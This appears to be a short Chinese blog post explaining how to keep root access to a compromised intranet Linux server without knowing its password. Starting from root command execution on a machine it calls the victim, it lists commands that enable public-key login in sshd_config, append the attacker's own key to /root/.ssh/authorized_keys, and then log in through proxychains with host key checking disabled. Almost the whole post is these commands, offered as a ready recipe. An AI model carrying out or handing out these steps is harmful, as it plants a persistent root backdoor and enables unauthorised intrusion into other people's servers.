无密码通过代理登录内网linux服务器

时间:2021-04-07 11:05:28   收藏:0   阅读:0

  RCE root权限执行命令,无法读取密码的情况下

 

1:在受害者机子上执行如下命令,开启认证

# echo RSAAuthentication yes >> /etc/ssh/sshd_config
# echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
# systemctl restart sshd

  

2:回到本地linux上生成密钥对

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
# ls -al /root/.ssh/
# cp /root/.ssh/id_rsa.pub /home/sot/Desktop/
# mv /home/sot/Desktop/id_rsa.pub /home/sot/Desktop/authorized_keys

  

3:被害机子上执行,追加操作

# echo ssh-rsa AA**+ldFbB root@Riter >> /root/.ssh/authorized_keys

  

4:本地开代理执行

proxychains4 ssh -t -o "StrictHostKeyChecking no" root@172.16.7.28

  

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2
迷上了代码!